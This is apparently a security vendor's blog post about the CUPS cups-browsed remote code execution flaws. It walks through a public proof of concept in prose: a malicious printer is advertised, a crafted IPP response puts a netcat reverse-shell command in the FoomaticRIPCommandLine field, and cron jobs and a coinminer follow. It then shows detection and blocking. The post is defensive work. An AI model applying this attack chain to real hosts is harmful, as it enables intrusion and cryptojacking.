A series of critical severity bugs in the CUPS printers discovery mechanism (cups-browsed) affecting Linux hosts was recently disclosed. The vulnerabilities can be leveraged to automatically install a malicious printer and perform unauthenticated remote code execution attacks. The details about the vulnerabilities as well as exploit code is already available in the public domain. Uptycs released details about the vulnerabilities here.
In this blog we want to showcase how Uptycs detects and remediates exploitation attempts on a vulnerable machine.
For the purpose of exploitation, we used this poc.
From the attacker machine, we run the exploit script to advertise our malicious printer with the name “BestPrinter” which would execute the nc command for reverse shell execution as shown in the image below.
The above command creates a multicast DNS query packet for advertising the malicious printer.
In the victim machine, when we try to print a page from Firefox, the malicious printer appears in the printer list.
In the background, an IPP (Internet Printing Protocol) request packet is generated by the victim host to get more attributes about the printer. The exploit script responds by sending a crafted IPP Response with the exploit command present in the “FoomaticRIPCommandLine” field. This essentially tells the CUPS system to execute the foomatic-rip filter binary when a print job is sent to this printer. A malicious temporary PPD (PostScript Printer Description) file for a printer is generated.
Fig 3. IPP request and response containing exploit command
Victim has to manually click on the “Print” button to trigger the exploitation.
The exploit runs successfully to trigger a reverse shell. We execute further commands to get system information, set cron jobs and further deploy CoinMiner.
Uptycs automatically scans the entire infrastructure, hosts, containers, images and Lambda functions for impact and surfaces that on a dashboard.
Fig 6. Trending Vulnerabilities
You could get a detailed vulnerability report by double clicking into the vulnerability.
Fig 7. Vulnerability Scan Report for CUPS CVEs.
Vulnerabilities are prioritized by evaluating the environment in which the vulnerability is found. Information such as internet exposure, a process from a vulnerable package id currently running and the process is running in a privileged mode. Mere presence of a package is lower priority than if a process from the vulnerable package is running and if it is running as a privileged user. If the asset is exposed to the internet (receiving inbound connection from public IP addresses) the priority is further increased.
Uptycs does not stop at just detecting the vulnerability. Our customers' infrastructure is protected from attackers leveraging the vulnerability to commit malicious activity.
Uptycs detects exploitation activities and protects users from getting attacked. Uptycs in a protect mode blocks the exploitation activity at the initial stage by killing the malicious process launched by the attacker thereby stopping the attacker from compromising the target machine. In a detect mode the exploitation is not blocked but all of the activity of the attacker is alerted and deep telemetry is collected for investigators to conduct forensic activity.
When Uptycs is configured in Protect mode, the attack is stopped when the reverse shell is executed by the exploit script.
When we performed the attack in Detect mode, we see the full attack chain where the foomatic-rip process, whose parent is cupsd process, launches bash to execute reverse shell and coinminer attacks.
The Uptycs team is ready to help. If you would like to learn more about the Uptycs Platform, speak to one of our experts, and see a demo of how to investigate and remediate issues like this one contact us today.